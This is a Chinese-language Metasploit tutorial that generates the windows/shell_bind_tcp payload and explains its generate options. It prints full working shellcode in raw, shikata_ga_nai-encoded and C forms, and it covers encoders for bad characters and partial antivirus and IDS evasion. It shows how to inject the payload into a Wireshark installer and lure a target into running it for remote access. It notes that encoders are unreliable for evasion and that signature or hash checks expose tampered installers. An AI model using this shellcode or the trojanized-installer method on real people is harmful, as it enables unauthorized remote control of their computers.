msf > use payload/windows/shell_bind_tcp #使用该模块绑定(监听)本机的一个TCP连接端口 msf payload(windows/shell_bind_tcp) > generate #通过generate生成16进值的payload,默认以rube语言编写的 # windows/shell_bind_tcp - 328 bytes # http://www.metasploit.com # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process buf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" + "\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" + "\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" + "\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" + "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" + "\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" + "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" + "\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" + "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" + "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" + "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" + "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" + "\x6f\x6a\x00\x53\xff\xd5" |
由 generate 产生的shellcode是完全可以运行的,但是其中包含一些null空字符(\x00),在一些程序进行解析时,这些空字符会被认为是字符串的结束,从而使得代码在完整执行之前被截断而终止运行。简单来说,\x00、\xff这类"坏字符"会破坏攻击负荷。
另外,在网络上明文传输的shellcode很可能被入侵检测系统和杀毒软件所识别。为了解决这一问题,Metasploit的开发者提供了MSF编码器,可以帮助渗透测试者通过对原始攻击载荷进行编码的方式来避免坏字符,并在一定程度上规避杀毒软件和IDS的检测(需要说明的是,编码器的主要作用是处理坏字符,它本身并不是可靠的免杀手段,x86/shikata_ga_nai 这类常用编码器的输出特征早已被主流检测引擎识别)。
我们使用generate -b '\x00'对\x00坏字符进行编码,避免在执行过程中被截断而终止。
msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai #表示使用此Encoder对坏字符进行编码,generate会自动选择Encoder # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process buf = "\xbd\x43\x0e\x07\xaa\xda\xd0\xd9\x74\x24\xf4\x58\x29\xc9" + "\xb1\x53\x31\x68\x12\x03\x68\x12\x83\xab\xf2\xe5\x5f\xd7" + "\xe3\x68\x9f\x27\xf4\x0c\x29\xc2\xc5\x0c\x4d\x87\x76\xbd" + "\x05\xc5\x7a\x36\x4b\xfd\x09\x3a\x44\xf2\xba\xf1\xb2\x3d" + "\x3a\xa9\x87\x5c\xb8\xb0\xdb\xbe\x81\x7a\x2e\xbf\xc6\x67" + "\xc3\xed\x9f\xec\x76\x01\xab\xb9\x4a\xaa\xe7\x2c\xcb\x4f" + "\xbf\x4f\xfa\xde\xcb\x09\xdc\xe1\x18\x22\x55\xf9\x7d\x0f" + "\x2f\x72\xb5\xfb\xae\x52\x87\x04\x1c\x9b\x27\xf7\x5c\xdc" + "\x80\xe8\x2a\x14\xf3\x95\x2c\xe3\x89\x41\xb8\xf7\x2a\x01" + "\x1a\xd3\xcb\xc6\xfd\x90\xc0\xa3\x8a\xfe\xc4\x32\x5e\x75" + "\xf0\xbf\x61\x59\x70\xfb\x45\x7d\xd8\x5f\xe7\x24\x84\x0e" + "\x18\x36\x67\xee\xbc\x3d\x8a\xfb\xcc\x1c\xc3\xc8\xfc\x9e" + "\x13\x47\x76\xed\x21\xc8\x2c\x79\x0a\x81\xea\x7e\x6d\xb8" + "\x4b\x10\x90\x43\xac\x39\x57\x17\xfc\x51\x7e\x18\x97\xa1" + "\x7f\xcd\x02\xa9\x26\xbe\x30\x54\x98\x6e\xf5\xf6\x71\x65" + "\xfa\x29\x61\x86\xd0\x42\x0a\x7b\xdb\x7d\x97\xf2\x3d\x17" + "\x37\x53\x95\x8f\xf5\x80\x2e\x28\x05\xe3\x06\xde\x4e\xe5" + "\x91\xe1\x4e\x23\xb6\x75\xc5\x20\x02\x64\xda\x6c\x22\xf1" + "\x4d\xfa\xa3\xb0\xec\xfb\xe9\x22\x8c\x6e\x76\xb2\xdb\x92" + "\x21\xe5\x8c\x65\x38\x63\x21\xdf\x92\x91\xb8\xb9\xdd\x11" + "\x67\x7a\xe3\x98\xea\xc6\xc7\x8a\x32\xc6\x43\xfe\xea\x91" + "\x1d\xa8\x4c\x48\xec\x02\x07\x27\xa6\xc2\xde\x0b\x79\x94" + "\xde\x41\x0f\x78\x6e\x3c\x56\x87\x5f\xa8\x5e\xf0\xbd\x48" + "\xa0\x2b\x06\x78\xeb\x71\x2f\x11\xb2\xe0\x6d\x7c\x45\xdf" + "\xb2\x79\xc6\xd5\x4a\x7e\xd6\x9c\x4f\x3a\x50\x4d\x22\x53" + "\x35\x71\x91\x54\x1c" |
当然,也可以通过generate -e自行指定Encoder对坏字符进行编码。
msf payload(windows/shell_bind_tcp) > generate -e x86/nonupper |
generate的参数列表:
-b:指定需要过滤的坏字符,generate会通过编码避开这些字节
-t:指定payload的输出格式,如exe格式、py格式,默认是以ruby语言形式输出的16进制编码字符串
-e:指定某个Encoder进行编码,不指定的话,系统会自行选择适合的Encoder
-i:后面跟编码迭代次数,即重复编码的次数
-k:不产生新的进程,只在新线程中运行payload(即保留模板程序的原有功能),提高隐蔽性。
-x:将payload注入到可执行文件模板中(可以理解为一个正常的应用程序),这样只要该应用程序运行,payload也会随之运行。
-f:指定输出的位置
举个例子:
我们在wireshark.exe程序中插入payload并命名为1.exe
msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /root/Wireshark-win64-2.6.3.exe -f /root/1.exe [*] Writing 628224 bytes to /root/1.exe... |
然后可以将修改后的wireshark打包发送给目标主机使用者,诱使其运行,然后便可以在本地使用远程工具连接目标主机了。需要注意的是,这样注入过payload的可执行文件,其哈希值与官方发行版不再一致,原有的数字签名也随之失效,防御方通过签名/哈希校验即可发现这类被篡改的安装包。
NOP:no-operation(空操作指令):当程序执行到NOP指令的时候,CPU会直接滑到当前字节的下一个字节继续执行,如果下一个字节也是NOP,便会一直往下滑。
使用generate -t c:指定以C语言源码的格式输出此payload
msf payload(windows/shell_bind_tcp) > generate -t c /* * windows/shell_bind_tcp - 328 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, * EXITFUNC=process */ unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; |